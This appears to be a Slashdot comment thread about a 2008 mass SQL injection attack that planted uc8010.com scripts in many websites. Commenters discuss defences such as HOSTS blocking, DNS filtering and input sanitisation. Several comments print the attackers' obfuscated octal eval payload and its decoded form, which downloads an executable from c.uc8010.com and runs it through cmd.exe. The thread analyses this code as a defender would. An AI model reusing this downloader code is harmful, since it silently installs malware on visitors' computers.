The average person is not going to be able to tell the difference between "benware" and malware, especially if they are tired of clicking through dialog boxes to approve programs. They'll just ignore it like they ignore clickwraps.

There's not nearly enough digital signing, even from reputable sources, to make "No signatrue? No execute" work. You can't get the things you want by applying this policy, and because people don't apply the policy, nobody bothers to go through the effort of signing. You would need to have such a policy instituted by default by the machine itself in order for it to make any headway, but MS got skewered for their attempts to go in that direction.

Re:well then it ain't gonna stop

[John+Hasler]

> There's not nearly enough digital signing, even from reputable sources, to make "No
> signatrue? No execute" work. You can't get the things you want by applying this policy,
> and because people don't apply the policy, nobody bothers to go through the effort of
> signing.

I install only signed code and I get everything I want. I use Debian.

Why crackers aint anymore crackin sites?

[Fri13]

I tought that good guys dont attack against web pages but bad guys does.
It's just a sad thing when Bill Gates and Linus Torvalds as Hackers, works as criminals!

(or mayby it's just that someone dont know what difference is with a Cracker and a Hacker!!!)

Spooky coincidence...?

[spasticfantastic]

Strange that CA and McAfee both had signatures detecting legit java script as infected last week. Just how closely do the virus writers and the "security" firms work together?

Re:Spooky coincidence...?

CA and McAfee there's your problem

Protect yourself with HOSTS

[martyb]

Another approach is to just block it in your HOSTS file:

127.0.0.1 uc8010.com

Or, even better, use an updated HOSTS file which has entries to block malicious sites: (on last check, this blocked over 16,000 addresses!): http://www.mvps.org/winhelp2002/hosts.zip

Description and explanation is here.

Re:Protect yourself with HOSTS

[Yaztromo]

Another approach is to just block it in your HOSTS file:

127.0.0.1 uc8010.com

Just FYI, doing my own quick Google search, it appears that the hosts used by the bulk of these attacks is actually c.uc8010.com and n.uc8010.com. Indeed, it looks like all one-letter hostnames are used for this domain. So modification of your HOSTS should be made accordingly to ensure all hosts from this domain are indeed re-routed.

Yaz.

Re:Protect yourself with HOSTS

[martyb]

Another approach is to just block it in your HOSTS file: 127.0.0.1 uc8010.com Just FYI, doing my own quick Google search, it appears that the hosts used by the bulk of these attacks is actually c.uc8010.com and n.uc8010.com. Indeed, it looks like all one-letter hostnames are used for this domain. So modification of your HOSTS should be made accordingly to ensure all hosts from this domain are indeed re-routed. Yaz. Yup. You're right. I took a look at the latest HOSTS file I downloaded and it does the right thing:

127.0.0.1 c.uc8010.com #[Javascript.Exploit]
127.0.0.1 n.uc8010.com

Re:Protect yourself with HOSTS

[rHBa]

You might want to check that rnmb.net and ucmal.com are added to the list.

Re:Protect yourself with HOSTS

[Technician]

Another approach is to just block it in your HOSTS file:

A filtered DNS server goes a long way and often is already blocking the content before you learn about it. A filtered DNS server isn't just for NSFW sites. It's a good idea. Common phishing sites, malware, and porn are filtered cross platform. I use it all the time now.

http://www.scrubit.com/

It is community supported so when a new malware site pops up, anyone can report it so it can be quickly re-routed to the warning page instead of the bad page.

Re:Protect yourself with HOSTS

[inviolet]

Or, even better, use an updated HOSTS file which has entries to block malicious sites: (on last check, this blocked over 16,000 addresses!): http://www.mvps.org/winhelp2002/hosts.zip

Yes, that HOSTS file totally rocks. But be sure to review the readme file. The massive size of the file makes it sometimes necessary to disable the "DNS Client" service on Windows 2000, XP, and newer.

Re:Protect yourself with HOSTS

I already use OpenDNS. How does OpenDNS compare with ScrubIT?

I also use the hosts file from mvps. Personally, I find the google ads useful at times, so I edit out the google blocks. If you want to have fun, buy a 'gumstick' with Linux running on it for the sole purpose of answering host file redirects. Change 127.0.0.1 to the IP address of the HTTP server on the gumstick, then load a goofy page for that server. Cheap, low power, and fun....

Re:Protect yourself with HOSTS

Or even better, validate your input and stop using inline SQL.

This was a SQL Injection attack. Even if you mick your HOSTS file to block requests from a certain HOST, a web app vulnerable to SQL Injection is still vulnerable.

Re:Protect yourself with HOSTS

[sootman]

Funny. I've been using that hosts file for years.... on my 800 MHz G3 iBook. :-) No problems there!

Re:Protect yourself with HOSTS

[Technician]

I already use OpenDNS. How does OpenDNS compare with ScrubIT?

The biggest thing I noticed is the lack of any need to create an account. If you want to use ScrubIT, it's as simple as simply using their DNS server. In my case, I simply plugged in the DNS numbers in the router and that instantly protects the entire LAN including net appliances and all OS versions.

Just plug in the DNS numbers 67.138.54.100 and 207.225.209.66 into your router and the filter is done.

Re:Protect yourself with HOSTS

[Antibozo]

Just plug in the DNS numbers

Yes, this is just like OpenDNS except the IPs are 208.67.222.222 and 208.67.220.220. No account is necessary to use OpenDNS.

Re:Protect yourself with HOSTS

[jimbojw]

Hey now. I just installed that "hosts" thingie, and now none of my IE toolbars or emoticon packs work. What gives!

Re:Protect yourself with HOSTS

[ladadadada]

Neither of these two methods are particularly good at protecting you. As an analogy, imagine you are in a sword fight and every time you get hit, you place a piece of armour the same size as the gash over the gash. It would take you hours of fighting to get completely protected and you would not be protected until you had been hit everywhere.

A smarter method is to put armour on that covers everywhere and then take it off or open up holes in it as needed.

Backing away from the analogy again, use Firefox and install NoScript. When you find a site that requires JavaScript (Youtube, I'm looking at you) just add it into the allowed list.

Now, when the guys behind this attack buy a new domain name, you will already be protected.

Re:Protect yourself with HOSTS

Your little toolbars & BHO's, for IE (internet explorer/iexplore.exe)?

They are USUALLY what gets into your Internet Explorer/IE "Tools" menu, & are in fact, EXPLOITS!

The IE Tools menu -> "Manage Addons" menu item + "Enable/Disable Addons" submenu item's can show you much here...

IE's BIGGEST hassles start here in fact, imo @ least (& where many malwares/spywares/trojans actually startup from, giving you the insane number of popups, redirected sites (maliciously) etc.)...

Just something to be aware of:

See - Unless you know EXACTLY what they are up to, they are suspect, & if they don't come from a reputable vendor (in other words, one with something to lose, & can't afford the liability involved with being associated with malware production, like GOOGLE or YAHOO might be considered) as well??

WELL - Then, you get what YOU get (and, unfortunately, might give to others as well... like spam mail that is hijack infested).

HOSTS files &/or scrubbing DNS servers are just added protection for "layered security" which is the SENSIBLE trend to follow today, especially considering many of these bogus machinations in virus/trojans/spywares/rootkits etc. et al (malware in general) ARE "blended threats" as well (meaning they use MANY avenues to get to you).

Re:Protect yourself with HOSTS

"use Firefox and install NoScript. When you find a site that requires JavaScript (Youtube, I'm looking at you) just add it into the allowed list" - by ladadadada (454328) on Wednesday January 09, @03:45AM (#21966160) Homepage Opera does the job, better, because it is faster & safer, first of all... see this info., first:

----

SECUNIA DATA ON BROWSER SECURITY (dated 12/31/2007)

Opera 9.25 security advisories @ SECUNIA (0% unpatched):

http://secunia.com/product/10615/?task=advisories

----

Netscape 9.0.0.5 (0% unpatched):

http://secunia.com/product/14690/

----

FireFox 2.0.0.11 security advisories @ SECUNIA (26% unpatched):

http://secunia.com/product/12434/

----

IE 7 (latest cumulative update from MS) security advisories @ SECUNIA (33% unpatched):

http://secunia.com/product/12366/

----

Those %'s are the latest for FireFox 2.0.0.11, Netscape 9.0.0.5, IE7 after last "patch Tuesday" from MS with the "CUMULATIVE IE UPDATES" they have & Opera 9.25... all latest/greatest models.

So, as you can see? Well, NOT ONLY IS OPERA MORE SECURE/BEARING LESS SECURITY VULNERABILITIES?

It's faster too, on just about ANYTHING a browser does[/b], & is probably one of the MOST standards compliant browser under the sun (not counting HTML dev tools) on multiple OS platforms.

OPERA = FASTER OVERALL & ON THE MOST OS PLATFORMS TOO - This is borne out in these tests:

http://www.howtocreate.co.uk/browserSpeed.html

AND, yes others (most recently in Javascript parsing speeds), right here:

http://nontroppo.org/timer/kestrel_tests/

Opera's just more std.'s compliant, faster, & more secure (overall combined) than the others... so, "where do you want to go today?"...

----

ALL that, & WITHOUT having to use a 3rd party addon (like FireFox has in its .zpi ones), & thus, natively in its OWN featureset (fastest & safest browser there is that also passes most all standards tests well no less)...

That's done via its TOOLS menu -> Quick Preferences submenu item TO BLOCK JAVASCRIPT wholesale/universally & EASILY, first.

Secondly, IF you find a site you like that you ABSOLUTELY NEED to use Javascript (a key vector & tool used in today's attacks, even thru adbanners, just as bad ActiveX controls have been found to do, as well as Flash/Shockwave exploits also) on?

Then, heck - right click that site's page, & use Opera's native "EDIT SITE PREFENCES" popup menu item, & enable that which you need (the CONTENT &/or SCRIPTING tabs provide MOST of what you need to alter, even IFrames/Frames usage too, another present possible danger)!

(The ONLY thing NoScript MIGHT have over Opera's native feature is blocking javascript BY SOURCE, meaning some adbanners & such might show, others not, due to what YOU personally pick... & personally? That's nice, for a developer feature @ MOST imo... because in MY book @ least? Once a site's been shown to say, have BAD adbanners (but, decent content)?? I would block their adbanner servers WHOLESALE, anyhow... so, why would I want to see ANY of their banners @ that point?? To get infected???)

There appears to be more than one domain involved:

[rHBa]

There appears to be more than one domain involved:

http://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

Also, as it works by exploiting holes in real player I'd assume it won't effect you if you don't have real player?

I'm just glad I replaced it with Real Alternative ages ago.

bullies come in all forms...

there are the big meathead bullies that start fights in bars...and then there are the techy or geek bullies who aren't physically big enough to be meathead bullies but still have enough anxiety or insecurity that they need to try and run people down based on a lack of nerdiness...which is ironic.

I guess what I'm saying is...give it a fucking break. As soon as you started ranting, I just started snickering cuz I see this pathetic act all the time and it amuses me. Oh, come back with some insults, cuz I don't care. that makes me laugh too. The funny thing about bullies is that they don't understand how no self-respecting person cares about their little psycho dumb shit insult games. Oh man, you've entertained me this morning...

RealPlayer Exploit?

[rHBa]

http://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

This is NOT a mass attack

[blast3r]

If you search for "uc8010.com" in Google then click on the omit link at the bottom it shows about 94,000 "PAGES". Not Servers! One server had most of the pages infected. BTW, this is NOT a compromised 'SERVER'. The SQL database got injected with content but the actual server isn't compromised. This isn't news.

Re:This is NOT a mass attack

[jcaldwel]

I was able to see the script http://c.uc8010.com/0.js referenced in the Google search descriptions. I do a wget and inspect it, it sets a cookie, and includes another script through document.write, which in turn does some funky JS, and includes another script.

The moral of this story: This probably isn't a web site defacement attempt, but probably a browser hijack attempt. I don't follow IE security patches close enough to match anything with a knowledge base article, but some of the JS looked like buffer overflow attempts... particularly the following block:

document.writeln("<iframe src=http:\/\/c.uc8010.com\/1.html width=1 height=0><\/iframe>");
document.writeln("<script src=\'http:\/\/s106.cnzz.com\/stat.php?id=742266&web_id=742266\' language=\'JavaScript\' charset=\'gb2312\'><\/script>");
document.writeln("<script src=\'http:\/\/c.uc8010.com\/0\/007.js\' language=\'JavaScript\'><\/script>");

eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\14

Re:This is NOT a mass attack

[fbjon]

Page widening! Long time no see.

Re:This is NOT a mass attack

[Mr+44]

From the article:

Grisoft's Thompson said that his research had identified a 15-month-old vulnerability as one of those exploited by the attack code. The exploit, he said, targeted the MDAC (Microsoft Data Access Components) bug patched in April 2006 with the MS06-014 security update. "They went to the trouble of preparing a good Web site exploit, and a good mass hack but then used a moldy old client exploit. It's almost a dichotomy," said Thompson.

Re:This is NOT a mass attack

[Kelson]

The SQL database got injected with content but the actual server isn't compromised. This isn't news.

So it would be news if the injection ran arbitrary code on the server itself, but because it runs arbitrary code on the clients that visit the site, it's not news?

Just trying to figure out where the dividing line is.

I noticed some similarity...

[CRX588]

Thats funny, I recently complained to a US based, MidPhase about some Chinese scam site, uer168(dot)com. I noticed some similarity in the domain with the uc8010(dot)com domain from the article. The whois data is also much alike, at least the registrar is Xin Net Technology Corp. for both.

So far Midphase has refused to take the scam site off line, even though it's seems these Chinese crackers are affiliated.

Google engine to the rescue..

[metsu]

sounds like google's engine could mark these sites [INFECTED] on their index. would be a great added safeguard for unsuspecting victims...

Re:Google engine to the rescue..

[rolfc]

Everybody is using noscript anyway, aren't we?

Re:Google engine to the rescue..

[mabu]

This is yet another worm targeting Microsoft and IE. Nothing to see here.. Move along...

Why hack???

This is a crack not a hack or I'am wrong?

Just One Example

[soloport]

Here are more details on how such an attack can take place, and the devastation it can cause.

Default installation attack

Sounds like a default installation attack on the sysobjects table. This is why I think wearing two hats or even three hats (insanity!) at a job is stupid because a designer or developer is not going to be a good server administrator and will fall prey to these kinds of attacks. If not on installation then because they won't have time to follow the news of new threats.

Re:Default installation attack

[Tablizer]

This is why I think wearing two hats or even three hats (insanity!) at a job is stupid because a designer or developer is not going to be a good server administrator and will fall prey to these kinds of attacks. If not on installation then because they won't have time to follow the news of new threats.

Companies have been looking for all-in-one IT employees more of late. Offshoring is perhaps part of the reason, and shaving a buck is the other.

more un-authorized programming

[Grampaw+Willie]

this hack is just another example of tricking the victim into executing un-authorized code

the block has to be at the java/parser so that when java is envoked to start parsing a code segment for any reason the first thing it does is look for the signature for that program

NO SIGNATURE? NO EXECUTE.

the days of running anything on anybody's computer need to come to an abrupt halt here

So what does it do?

[slashbart]

document.writeln("");
document.writeln("");
document.writeln("");

eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

Any idea?

Re:So what does it do?

[onedotzero]

It's a pretty simple Javascript that requests a .exe file from a chinese server and writes it to a temporary file using IE's FileSystemObject. It then runs cmd.exe to execute the file.

So, as usual, it's targetting the Windows/IE crowd.

Re:So what does it do?

Here's a translation:

function gn(rRaGEykU1)
{
  var Orh2=window["Math"]["random"]()*rRaGEykU1;
  return'~tmp'+'.tmp'
}
function DownE(FileURL,LocalFile)
{
  try
  {
    vip=FileURL;
    var chenzi=window["document"]["createElement"]("object");
    chenzi["setAttribute"]
      ("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var ps=chenzi["CreateObject"]("Microsoft.XMLHTTP","");
    var love=chenzi["CreateObject"]("Adodb.Stream","");
    love["type"]=1;
    ps["open"]("GET",vip,0);
    ps["send"]();
    china=gn(10000)+LocalFile;
    var hHf$R6=chenzi["CreateObject"]("Scripting.FileSystemObject","");
    var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);
    china=hHf$R6["BuildPath"](VgDnZXHt7,china);
    love["Open"]();
    love["Write"](ps["responseBody"]);
    love["SaveToFile"](china,2);
    love["Close"]();
    var SmAcqIwGV8=chenzi["CreateObject"]("Shell.Application","");
    exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');
    SmAcqIwGV8["ShellExecute"](exp1,' /c '+china,"","open",0)
  }
  catch(i){i=1}
}

DownE("http://c.uc8010.com/0/1.exe","19.exe");

Re:So what does it do?

[mrdarreng]

Any idea? No fucking clue, but it managed to break out of slashdot's layout in FF. That's some powerful code!

Re:So what does it do?

Here is what that javascript says. Translated variable names from random letters into words and tabbed the code, otherwise its the same.

function gn(Mul)
{
        var Orh2=window["Math"]["random"]()*Mul;
        return'~tmp'+'.tmp'
}
function DownE(FileURL,LocalFile)
{
        try
        {
                vip=FileURL;
                var vRdsData=window["document"]["createElement"]("object");
                vRdsData["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
                var vAjax=vRdsData["CreateObject"]("Microsoft.XMLHTTP","");
                var vAdo=vRdsData["CreateObject"]("Adodb.Stream","");
                vAdo["type"]=1;
                vAjax["open"]("GET",vip,0);
                vAjax["send"]();
                vSaveAsPath=gn(10000)+LocalFile;
                var vFsObject=vRdsData["CreateObject"]("Scripting.FileSystemObject","");
                var vGetSpecialFolder=vFsObject["GetSpecialFolder"](0);
                vSaveAsPath=vFsObject["BuildPath"](vGetSpecialFolder,vSaveAsPath);
                vAdo["Open"]();
                vAdo["Write"](vAjax["responseBody"]);
                vAdo["SaveToFile"](vSaveAsPath,2);
                vAdo["Close"]();
                var vShellCmd=vRdsData["CreateObject"]("Shell.Application","");
                exp1=vFsObject["BuildPath"](vGetSpecialFolder+'\\system32','cmd.exe');
                vShellCmd["ShellExecute"](exp1,' /c '+vSaveAsPath,"","open",0)
        }
        catch(i)
        {
                i=1
        }
}
DownE("http://c.uc8010 dot com/0/1.exe","19.exe");

Re:So what does it do?

function gn(rRaGEykU1)
{
var Orh2=window["Math"]["random"]()*rRaGEykU1;
return'~tmp'+'.tmp'
}
function DownE(FileURL,LocalFile)
{
try
{
vip=FileURL;
var chenzi=window["document"]["createElement"]("object");
chenzi["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var ps=chenzi["CreateObject"]("Microsoft.XMLHTTP","");
var love=chenzi["CreateObject"]("Adodb.Stream","");
love["type"]=1;
ps["open"]("GET",vip,0);
ps["send"]();
china=gn(10000)+LocalFile;
var hHf$R6=chenzi["CreateObject"]("Scripting.FileSystemObject","");
var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);
china=hHf$R6["BuildPath"](VgDnZXHt7,china);
love["Open"]();
love["Write"](ps["responseBody"]);
love["SaveToFile"](china,2);
love["Close"]();
var SmAcqIwGV8=chenzi["CreateObject"]("Shell.Application","");
exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');
SmAcqIwGV8["ShellExecute"](exp1,' /c '+china,"","open",0)}catch(i){i=1}
}
DownE("http://c.uc8010.com/0/1.exe","19.exe");

Any recommendations?

[egosum]

Any recommendations for Open Source tools that check for SQL injection vulnerabilities in web forms?

Re:Any recommendations?

[Wodin]

Maybe this?

sqlmap

I haven't tried it.

is Firefox safe ..

[rs232]

"Wouldn't NoScript protect the Firefox users out there?"

It's not clear from the article but the exploit seems to require Microsoft SQL Server, and on the client Internet Explorer and Windows to function. For instance would Firefox on Unbuntu be safe.

"tries to hijack their PCs using multiple exploits, security experts said this weekend"

protect yourself with privoxy ...

[rs232]

"Another approach is to just block it in your HOSTS file:

Privoxy is a much for efficient solution .. blocks adverts too ...

was Re:Protect yourself with HOSTS

I think my site got hit by this and survived

[tsilb]

I noticed some supicious form posts on my own site over the past several days, coming form Harvard.edu. I had dismissed it at the time as being some random student spammer, but it looks like I may have been on their attack list.

The event logs didn't show the entire string they attempted to post, so at the time I wasn't able to track it back to the source HTML and JS files used. From what I can tell now, they seem to be using a botnet. The above is a permalink to my blog post in response to the event. As a potential victim, I will be researching the event. As I learn more I will add an additional post with a permalink in that post's comments.

You forgot c)

[WebCowboy]

...which is at least as likely as the other two theories you postulated:

c) This was a pimple-faced little script-monkey who came across a stale old "toolkit" and was just clever enough to automate the deployment of the SQL injection attack.

It's really easy to patch the RDS activeX control, and not so easy to manually correct old custom-written web apps. Just a sad commentary on how shipshod web development standards has been in the past, and the lasting legacy it has created. Sanitising user input is (or should be) "programming 101" stuff.

click fraud and steal online game credentials ..

[rs232]

"Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations, security researches say"

didn't involve exacition of code ..

[rs232]

'Uh - this attack didn't involve the execution of any "code"'

"Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations"

"The injections included javascript that redirected end users to the rogue site, which then attempted to exploit multiple vulnerabilities to install key-logging software that stole passwords for various online games"br>
was: Re:dumb or troll ? (Score:4, Excuse~1))

Re:didn't involve exacition of code ..

[Rich0]

Ok, it didn't involve execution of code by the webserver (at least, not code that selinux would protect against). The compromised server did put out exploit data that infected end-user PCs - which probably did ultimately execute code. However, unless you get EVERYBODY to run selinux it wouldn't help.

Context!

Intervention time!

[Tony]

Remember all those times when you have to clean up your parents/in-law/friends computers because they get compromised by this crap?

Yeah. See, that makes us part of the problem. We are facilitating it by cleaning up after it.

Instead, it's time to do a mass computer intervention. The next time your parents/gf/bf/in-laws/friends call you to clean up their computer, tell them they are on their own. Suggest they purchase a Mac next time. Or, tell them you'll help them install Linux or your favorite BSD flavor, or even (if you are so inclined and so insane) Open Solaris. Explain that you cannot continue to enable their dependence on a terrible drug, and that it hurts you to watch them slowly destroy themselves.

C'mon, Slashdot! We have strength in numbers. Let's turn this epidemic around. We'll be saving the sanity and minds of our friends and family, giving ourselves back some free time, and generally helping the world.

This will help in other ways, too. Almost all spam is sent from MS-Windows zombies. Let's get our family clean first, and work on the rest later.

Re:Intervention time!

[mabu]

You don't need to have people switch OSes. You just need to remove IE from their system and install Firefox+NoScript. I don't even run antivirus software any more since I dumped Outlook (and use text-only e-mail) and switched to Firefox.

targets only microsoft servers

[mabu]

FTA: It's possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains."

I think that's a relevant aspect to report. This is yet another MS-based vulnerability. It also makes sense since IIS servers are more likely to be serving the much less secure IE client.

Re:targets only microsoft servers

[tomandlu]

"It also makes sense since IIS servers are more likely to be serving the much less secure IE client."

That has to be one of the most idiotic things I've ever read. I'm not even going to bother commenting on the minor idiocy of thinking that this is an MS vulnerability, since others have already done that in relation to other posts, but your final comment is just deranged.

It's like suggesting that Sony artists are more likely to be listened to on a Sony CD player than non-Sony artists. Just really, really silly.

compromised servers

[mabu]

Google search to show compromised servers:
    http://www.google.com/search?q=src%3Dhttp%3A%2F%2Fc.uc8010

There may be more - I used a specific reference to c.uc8010. Right now, Google shows 24,000 infected pages.

It looks like all the servers are IIS. Running .ASP applications written by boneheaded programmers who didn't sanitize their input.

This is the problem with programming. You can't "idiot proof" a web site if the biggest idiot is the guy you've hired to write the application.

Re:compromised servers

[Locutus]

I too saw the common threat being IIS and ASP but also saw some ASPX sites. I was able to cause a failure on one site and the returned error page showed "Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407" at the bottom of the page.

I've not be able to dig deep enough yet to see if it is some common application or framework which is allowing the SQL injections but will keep looking.

As others have noted, the injection is targetting MS SQL Server so the fact that all the sites are running Windows is a gimme. There running of ISS could be an indicator but I'll look to see if an apache site was hit but the ASP/ASPX in most of the sites URL's could indicate that this is a flaw in one of Microsofts API's and require Microsoft software from OS all the way to web server, framework, and database.

Keep digging because so far, I've not seen the press or security sites saying what is behind the flaw. Just that it's a SQL injection exploit.

LoB

Re:compromised servers

[Allador]

This has been covered.

This requires absolutely no vulnerability or exploit in IIS, MSSQL, or Windows Server.

It just requires the app to allow sql injection. Everything past there is plain vanilla, no special perms needed.

As I posted to someone else, this works even if the webserver, sqlserver, and windows server are all fully patched, and everything is put together in best-practices scenario. Even if IIS and MSSQL are running with service accounts that are non-admin, with maximally locked down configurations.

This would have worked on ANY database if they would have chosen to write code using ANSI standard INFORMATION_SCHEMA rather than sysobjects to reflect on the db tables.

Once the SQL Injection through, about the only thing that would have stopped this is:

1. Restricting all data-writes to the db tables to stored procedures.

2. XSS and script filtering on the web app writing the corrupted CLOB to a webpage.

And on the SQL Injection side, there doesnt need to be any common framework. they could just be scanning for injectable forms. It's not hard to write a script that will look for those in the general case.

Re:compromised servers

[Locutus]

